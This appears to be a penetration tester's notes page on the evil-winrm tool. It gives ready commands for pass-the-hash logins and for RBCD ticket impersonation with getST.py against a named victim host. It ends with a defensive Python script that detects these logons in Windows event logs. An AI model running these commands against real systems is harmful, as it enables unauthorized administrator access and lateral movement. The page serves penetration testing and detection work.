# evil-winrm
[evil-winrm](https://github.com/Hackplayers/evil-winrm) is awesome for PowerShell remoting into devices - even with just a local admin *hash*!

## Connect to host with evil-winrm using docker and an account hash
```
sudo docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 1.2.3.4 -u administrator -H YOUR-HASH-GOES-HERE
```

If you're going to connect with a password, replace `-H YOUR-HASH-GOES-HERE` with `-p YOUR-PASS-HERE`.

## Connect to host with a local directory mapped for uploads and downloads
This is important. If you're going to connect to a host and want to be able to upload/download files, you need to mount a local directory into the container (here `/home/sevminsec/Desktop/payloads` on the host becomes `/data` inside the container) like so:

```
sudo docker run -v /home/sevminsec/Desktop/payloads:/data --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.1 -u 7ms -p supsecpass!
```

## Use Kerberos
The [README](https://github.com/Hackplayers/evil-winrm) talks about how to get Kerberos going with evil-winrm, and I'm not sure how necessary installing the Kerberos packages or editing `/etc/krb5.conf` was. But what I DO know is I got all sorts of errors trying to get the Kerberos connection made until I did the following command inside of [exegol](/software/exegol/):

```
evil-winrm -i HOST -r domain.com
```

### Misc Kerberos troubleshooting notes
If you're in an RBCD situation where you've stolen a TGS so that you can connect to (for example) the SMB service as admin, I finally had a need to steal a WinRM ticket so I could pass that with evil-winrm. The commands were as follows (with *TT-DEV01* being the victim in a domain called *tangent.town*):

```
getST.py -impersonate administrator -spn 'WSMAN/TT-DEV01.tangent.town' -dc-ip 192.168.10.100 'tangent.town/PHANTOM$' -k -no-pass

export KRB5CCNAME=administrator@WSMAN_TT-DEV01.tangent.town@TANGENT.TOWN.ccache

evil-winrm -i TT-DEV01.tangent.town -r tangent.town --spn WSMAN
```
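From the blue-team side, the three connection styles above (hash or password via `-H`/`-p`, and Kerberos via `-r`) all land on the target as a network logon (Security event 4624, logon type 3) followed a moment later by a WSMan shell creation (event 91 in the Microsoft-Windows-WinRM/Operational log). The script below is an added example, not part of these notes or of the evil-winrm project: it correlates those two records over a small constructed event set so you can see what each of the page's flows looks like in the logs. The record layout is a simplified flattening of the standard 4624 EventData fields plus a constructed `User` field for event 91; the 10-second correlation window is an assumption, not a Windows default.

```python
from datetime import datetime

# Constructed sample records, not real logs. Field names for 4624 follow the
# standard Security EventData names; the event-91 record is a simplified shape.
SAMPLE_EVENTS = [
    # evil-winrm -H / -p against a local admin: NTLM network logon, then a shell
    {"Channel": "Security", "EventID": 4624, "Time": "2024-01-10T09:00:01",
     "LogonType": 3, "TargetUserName": "administrator", "TargetDomainName": "TT-DEV01",
     "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.1.50"},
    {"Channel": "Microsoft-Windows-WinRM/Operational", "EventID": 91,
     "Time": "2024-01-10T09:00:02", "User": "TT-DEV01\\administrator"},
    # evil-winrm -r tangent.town: Kerberos network logon, then a shell
    {"Channel": "Security", "EventID": 4624, "Time": "2024-01-10T09:05:00",
     "LogonType": 3, "TargetUserName": "administrator", "TargetDomainName": "TANGENT",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.1.50"},
    {"Channel": "Microsoft-Windows-WinRM/Operational", "EventID": 91,
     "Time": "2024-01-10T09:05:01", "User": "TANGENT\\administrator"},
    # Network logon with no WSMan shell nearby (e.g. a file share): not flagged
    {"Channel": "Security", "EventID": 4624, "Time": "2024-01-10T10:00:00",
     "LogonType": 3, "TargetUserName": "svc_backup", "TargetDomainName": "TANGENT",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.1.7"},
    # Console logon (type 2): wrong logon type, ignored entirely
    {"Channel": "Security", "EventID": 4624, "Time": "2024-01-10T10:30:00",
     "LogonType": 2, "TargetUserName": "jsmith", "TargetDomainName": "TANGENT",
     "AuthenticationPackageName": "Negotiate", "IpAddress": "-"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def _account(event):
    # Normalise both record types to a bare, lower-cased account name.
    if event["EventID"] == 91:
        return event["User"].rsplit("\\", 1)[-1].lower()
    return event["TargetUserName"].lower()


def correlate_winrm_logons(events, window_seconds=10):
    """Pair each WSMan shell creation (EID 91) with the network logon (4624,
    type 3) for the same account that happened at most window_seconds earlier.
    Returns one finding per pair, annotated with the authentication package."""
    shells = [e for e in events
              if e["Channel"].endswith("WinRM/Operational") and e["EventID"] == 91]
    logons = [e for e in events
              if e["Channel"] == "Security" and e["EventID"] == 4624 and e["LogonType"] == 3]
    findings = []
    for shell in shells:
        for logon in logons:
            delta = (_ts(shell) - _ts(logon)).total_seconds()
            if _account(shell) == _account(logon) and 0 <= delta <= window_seconds:
                pkg = logon["AuthenticationPackageName"]
                if pkg == "NTLM":
                    hint = ("NTLM network logon followed by a WSMan shell: consistent with "
                            "a WinRM client using -H or -p; 4624 alone cannot tell hash from password")
                else:
                    hint = (f"{pkg} network logon followed by a WSMan shell: consistent with "
                            "a WinRM client using a Kerberos ticket (-r)")
                findings.append({
                    "user": f'{logon["TargetDomainName"]}\\{logon["TargetUserName"]}',
                    "source_ip": logon["IpAddress"],
                    "auth_package": pkg,
                    "shell_time": shell["Time"],
                    "hint": hint,
                })
    return findings


if __name__ == "__main__":
    for finding in correlate_winrm_logons(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed set this yields two findings, one NTLM and one Kerberos, both from the same source address; the share access and the console logon are not reported. The same correlation fires for any legitimate PowerShell remoting client, so the value is in the fields it surfaces (source IP, account, auth package) rather than in the match itself: an NTLM network logon by a local administrator from a workstation that should not be administering servers is the pattern the hash-based flow on this page leaves behind.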
